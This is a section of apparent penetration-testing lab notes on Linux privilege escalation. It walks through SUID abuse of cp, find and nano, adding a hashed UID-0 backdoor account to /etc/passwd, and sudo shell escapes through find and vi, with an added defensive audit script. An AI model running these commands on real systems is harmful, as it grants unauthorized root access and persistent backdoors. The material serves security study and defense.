5.2.2 SUID Exploitation
r=read, w=write, x=execute
rwx rwx rwx
user group others
421 421 421
4+2+1=7 4+2+1=7 4+2+1=7
chmod 777 #Maximum privileges
#Special Permissions
SUID (user) -> rwx -> rwS
SGID (group) -> rwx -> rwS
Sticky bits (others) -> rwT
chmod u+s (on a 755 file) is equivalent to chmod 4755
find / -perm -u=s -type f 2>/dev/null #find files with the SUID bit set
Suid Exploits (PoC)
CP Command
adduser new_user #create a new user
getent passwd new_user #check if new_user exists
su new_user #switch to new_user account
cp /etc/passwd /var/www/html/ #PERMISSION DENIED!
In fact, running find / -perm -u=s -type f 2>/dev/null does not list the cp path (alternatively, check its permissions with ls -al <command path>). To assign the SUID permission to the cp command we need chmod u+s on the path of the cp binary:
which cp
/usr/bin/cp
chmod u+s /usr/bin/cp #it needs root permissions
Now every user can execute the cp command with root permissions!
Then we can repeat the same copy of /etc/passwd from the new_user account:
su new_user
cp /etc/passwd /var/www/html/
The idea is to add a new user with root privileges, rather than having root only for the cp command.
Using openssl passwd we generate a password hash with the MD5-crypt algorithm (option -1) and a custom salt:
openssl passwd -1 -salt new_root_user new_password
$1$new_root$qigEVpHXRPIfTT6fXhm7H0 #hash (MD5-crypt keeps only the first 8 salt characters, hence new_root)
Then construct our custom account string to append to the /etc/passwd file, based on its seven-field format (name:password:UID:GID:GECOS:home:shell):
<username>:<hash>:0:0:root:/root:/bin/bash
new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0:0:0:root:/root:/bin/bash
Add it to our local copy of /etc/passwd with vim or nano, or copy it into the original file:
nano /etc/passwd
#paste it and save: new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0:0:0:root:/root:/bin/bash
Finally we can log in as new_root_user and have root privileges.
GTFOBins
Alternatively, we can escalate privileges using the commands listed on the GTFOBins site for the cp command in its SUID section.
FIND Command
Following the previous example, we proceed with the find command, using the same normal user (new_user).
which find
/usr/bin/find
ls -al /usr/bin/find
-rwxr-xr-x 1 root root 224848 8 gen 2023 /usr/bin/find
chmod u+s /usr/bin/find #give SUID permissions, it needs root permissions
To escalate privileges we only need to look up an existing file with the find command and run a program through -exec:
find example_file -exec "whoami" \;
root
GTFOBins
Alternatively, we can escalate privileges using the commands listed on the GTFOBins site for the find command in its SUID section.
NANO Command
As the last case, we run this sequence of commands for the nano SUID exploitation:
which nano
/usr/bin/nano
ls -al /usr/bin/nano
-rwxr-xr-x 1 root root 287480 18 gen 2023 /usr/bin/nano
chmod u+s /usr/bin/nano #give SUID permissions, it needs root permissions
Now a normal user can open files that require root permissions, such as /etc/passwd, using nano:
nano /etc/passwd
As in the cp SUID example, the idea is to add a new user with root privileges, rather than having root only for the nano command.
Using openssl passwd we generate the password hash exactly as in the cp example (MD5-crypt, option -1, custom salt):
openssl passwd -1 -salt new_root_user new_password
$1$new_root$qigEVpHXRPIfTT6fXhm7H0 #hash
Then we build the same seven-field account line as before (name:password:UID:GID:GECOS:home:shell) and, since nano now runs as root, paste it directly into /etc/passwd and save:
nano /etc/passwd
#paste it and save: new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0:0:0:root:/root:/bin/bash
Finally we can log in as new_root_user and have root privileges.
GTFOBins
Alternatively, we can escalate privileges using the commands listed on the GTFOBins site for the nano command in its SUID section.
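As an added example (not part of the original notes), a small defender-side audit script for the steps in the cp, find and nano sections above: it flags UID-0 accounts other than root and entries without the seven passwd fields in a passwd-format file, and reports setuid-root binaries from a watchlist. The sample passwd content is constructed for illustration; the watchlist paths /usr/bin/cp, /usr/bin/find, /usr/bin/nano and /usr/bin/vi are the ones these notes use.

```shell
#!/bin/sh
# Added defender-side audit for the two things shown in these notes:
#  1. a passwd-format file containing UID-0 accounts other than root
#     (what appending the new_root_user line produces), and lines that
#     do not have the seven fields name:pw:uid:gid:gecos:home:shell;
#  2. setuid-root binaries among a watchlist of programs that GTFOBins
#     lists as shell-escaping when setuid (cp, find, nano, vi).
# Example code, not from the original notes; assumes POSIX sh, awk and
# a find that understands -maxdepth (GNU and BSD both do).

# Print the names of all UID-0 accounts that are not "root".
extra_uid0_accounts() {                  # $1 = passwd-format file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print "lineno:line" for every entry whose field count is not 7.
malformed_passwd_lines() {               # $1 = passwd-format file
    awk -F: 'NF != 7 { print NR ":" $0 }' "$1"
}

# Print each argument that exists, is a regular file, is owned by root
# and has the setuid bit set; missing paths are silently skipped.
suid_root_watchlist() {                  # $@ = binaries to check
    for f in "$@"; do
        [ -e "$f" ] && find "$f" -maxdepth 0 -type f -perm -4000 -user root -print
    done
    return 0
}

# Constructed sample passwd content (illustration only): the real root
# entry, a normal user, and the injected UID-0 account from the notes.
sample_passwd() {
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'new_user:x:1001:1001::/home/new_user:/bin/bash' \
        'new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0:0:0:root:/root:/bin/bash'
}

# Run as "sh audit.sh demo" to see the checks on the sample and the host.
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp) && sample_passwd > "$tmp"
    echo "UID-0 accounts besides root:"; extra_uid0_accounts "$tmp"
    echo "Entries without 7 fields:";    malformed_passwd_lines "$tmp"
    echo "Setuid-root watchlist hits on this host:"
    suid_root_watchlist /usr/bin/cp /usr/bin/find /usr/bin/nano /usr/bin/vi
    rm -f "$tmp"
fi
```

Pointing extra_uid0_accounts at the real /etc/passwd and scheduling suid_root_watchlist over the output of the find command from the top of these notes gives a simple recurring check for both persistence tricks.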
RIGHT Command
The sudoers file can contain users with specific root permissions called sudo rights, e.g. new_user can execute the find command as root:
visudo #to open sudoers file
root ALL=(ALL:ALL) ALL
new_user ALL=(root) NOPASSWD: /usr/bin/find
To escalate privileges we only need to run find on an existing path through sudo and spawn a shell via -exec:
su new_user
sudo find /home -exec /bin/bash \;
root
The same works for other commands, e.g. the vi command:
new_user ALL=(root) NOPASSWD: /usr/bin/vi
su new_user
sudo vi example_file
:!bash #type it in vi command mode and press Enter
root
The same is possible with other commands such as man, python, nano, vim, etc.